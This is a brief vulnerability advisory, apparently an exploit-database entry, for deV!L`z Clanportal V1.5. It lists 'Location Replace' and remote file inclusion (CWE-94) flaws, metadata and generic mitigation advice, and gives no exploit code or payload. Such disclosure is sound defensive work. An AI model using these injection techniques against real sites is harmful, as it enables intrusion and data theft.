Vendor: CMS
By: indoushka
CVSS: 8.8 (HIGH)
Location Replace and RFI
CWE: 94
Product Name: CMS
Affected Version From: V1.5
Affected Version To: V1.5
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)
2010
deV!L`z Clanportal V1.5 Multi Vulnerability
The vulnerability allows an attacker to inject malicious code into the vulnerable application using the 'Location Replace' and 'RFI' (remote file inclusion) techniques. In both cases the attacker sends a crafted URL to the vulnerable application. The 'RFI' technique can also be used to gain access to sensitive information stored on the vulnerable application.
Mitigation:
The application should be configured to only accept requests from trusted sources. The application should also be configured to validate all user input and reject any malicious input.